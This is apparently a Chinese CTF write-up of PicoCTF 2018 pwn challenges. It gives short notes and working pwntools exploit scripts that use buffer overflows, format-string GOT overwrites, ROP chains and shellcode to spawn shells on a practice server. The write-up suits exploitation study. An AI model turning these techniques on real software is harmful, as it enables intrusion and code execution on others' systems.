are_you_root

  • 验证码未初始化,第一次覆盖下一次的验证码后,下一次验证码为上一次覆盖
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_are_you_root")
sh = remote("node3.buuoj.cn","27788")

def login(name):
sh.sendlineafter("> ","login "+name)

def reset():
sh.sendlineafter("> ","reset")

def get_flag():
sh.sendlineafter("> ","get-flag")

if __name__ == '__main__':
login('a'*0x8+p64(0x5))
reset()
login("joe1sn")
get_flag()
print sh.recv(50)

authenticate

  • 字符串格式化漏洞修改 authenticated 的值
1
2
3
4
5
6
7
8
9
10
11
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_authenticate")
#sh = process("./PicoCTF_2018_authenticate")
sh = remote("node3.buuoj.cn","26278")

target_addr = 0x0804A04C
payload = fmtstr_payload(11,{target_addr:0x000000001})
sh.sendlineafter("(yes/no)\n",payload)
sh.recvuntil("Access Granted.\n")
print sh.recv(0x30)

buffer_overflow_0

  • strcpy溢出,接收参数溢出过后,自动打印出flag

buffer_overflow_1

  • gets溢出
1
2
3
4
5
6
7
8
9
10
from pwn import *
context.log_level= "debug"
elf = ELF("./PicoCTF_2018_buffer_overflow_1")
p = remote("node3.buuoj.cn","25355")

paylaod = "a"*(0x28+4)
paylaod += p32(elf.sym["win"])

p.sendlineafter("Please enter your string: \n",paylaod)
p.interactive()

buffer_overflow_2

  • gets溢出+libc leak
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
from pwn import *
from LibcSearcher import *
context.log_level= "debug"
elf = ELF("./PicoCTF_2018_buffer_overflow_2")
#p =process("./PicoCTF_2018_buffer_overflow_2")
p = remote("node3.buuoj.cn","25896")

puts_got = elf.got["puts"]
puts_plt = elf.plt["puts"]
vuln_addr = 0x08048646
win = elf.sym["win"]

payload = "a"*(0x6c+4)
payload += p32(win)+p32(0)+p32(0xDEADBEEF)+p32(0xDEADC0DE)
p.sendline(payload)
p.interactive()
#payload += p32(puts_plt)+p32(vuln_addr)+p32(puts_got)
'''
p.sendline(payload)

puts_real = u32(p.recv(4))
libc = LibcSearcher("puts",puts_real)
base = puts_real - libc.dump("puts")

sys_addr = base + libc.dump("system")
binsh = base + libc.dump("str_bin_sh")

payload = 'a'*(0x6c+4)
payload += p32(sys_addr)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
'''

buffer_overflow_3

爆破canary文件,然后rop

虚拟机崩了,原来的exp.py找不回来了,这个网上随便找一个就行

can_you_gets_me

  • gets溢出+rop链自动生成
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
from pwn import *
from struct import pack
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_can-you-gets-me")
sh = remote("node3.buuoj.cn","29149")

p = 'a'*(0x18+4)
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b81c6) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x080549db) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de955) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806f02a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049303) # xor eax, eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0807a86f) # inc eax ; ret
p += pack('<I', 0x0806cc25) # int 0x80

sh.sendlineafter("NAME!\n",p)
sh.interactive()

echo_back

  • 字符串格式化漏洞,覆盖puts为vuln,然后继续操作
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_echo_back")
#sh = process("./PicoCTF_2018_echo_back")
sh = remote("node3.buuoj.cn","27050")

vuln = 0x080485AB
payload = fmtstr_payload(7,{elf.got["puts"]:vuln})
sh.sendlineafter("input your message:\n",payload)

leak_payload = p32(elf.got["system"])+'%7$s'
sh.send(leak_payload)
sh.recvuntil('input your message:\n')
system_addr = u32(sh.recvuntil('\xf7')[-4:])
success("system addr -> "+hex(system_addr))

payload = fmtstr_payload(7,{elf.got["printf"]:system_addr})
sh.send(payload)

sh.sendline("/bin/sh\x00")
sh.interactive()

echooo

  • 字符串格式化漏洞,导致被读取在stream的flag文件被读取
1
2
3
4
5
6
from pwn import *
context.log_level = "debug"
elf = ELF("./PicoCTF_2018_echooo")
p = remote("node3.buuoj.cn","29044")
p.sendlineafter("> " , "%8$s")
p.interactive()

got_shell

  • 交换puts函数的got为后门函数
1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context.log_level= "debug"
elf = ELF("./PicoCTF_2018_got-shell")
#p = process("./PicoCTF_2018_got-shell")
p = remote("node3.buuoj.cn","27340")
puts_got = hex(elf.got["puts"])
win = hex(elf.sym["win"])

p.sendlineafter("4 byte value?\n",puts_got)
p.sendlineafter("\n",win)

p.interactive()

gps

  • 程序会跳转到一个地址,然后执行
1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
context.log_level = "debug"
context.arch="amd64"
#p = process("./picoctf_2018_gps")
p = remote("node3.buuoj.cn","26522")

p.recvuntil("Current position: 0x")
rc = int(p.recv(12),16)
stack = rc + 0x29c +0x520
info("stack -> 0x%x",stack)
p.sendlineafter("> ",asm(shellcraft.sh()).rjust(0x1000-20,"\x90"))
p.sendlineafter("> ",hex(rc))
p.interactive()
#p.sendlineafter("> ",p64(stack))

leak_me

  • 读取password.txt的栈刚好在fgets后面,通过填充leak password.txt的内容后,输入password得到flag
1
2
3
4
5
6
7
8
9
from pwn import *
context.log_level = "debug"
#p = process("./PicoCTF_2018_leak-me")
p = remote("node3.buuoj.cn","27898")
p.sendafter("What is your name?" , "a" * (0x100 - 1))
p.recvuntil("a" * 0xff + ",")
password = p.recvuntil("\n")
p.sendline(password)
p.interactive()

rop_chain

  • 溢出过后,64位使用寄存器传参,填入参数满足后门函数就好
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
context.log_level = "debug"
p = remote("node3.buuoj.cn","27583")
#p = process("./PicoCTF_2018_rop_chain")
elf = ELF('./PicoCTF_2018_rop_chain')

func1 = 0x080485CB
func2 = 0x080485d8
flag = 0x0804862B
pop_ret = 0x080485d6
buf = 'a'*0x18

payload = buf + 'aaaa'
payload += p32(func1)+p32(pop_ret) + p32(0)
payload += p32(func2)+p32(pop_ret) + p32(0xBAAAAAAD)
payload += p32(flag)+p32(pop_ret) + p32(0xDEADBAAD)

p.recvuntil('>')
p.sendline(payload)

p.interactive()

shellcode

  • 程序可以执行刚才输入的代码,直接填入shellcode
1
2
3
4
5
6
7
from pwn import *
context.log_level = "debug"
p = remote("node3.buuoj.cn","25260")

shellcode = asm(shellcraft.sh())
p.sendlineafter("Enter a string!\n",shellcode)
p.interactive()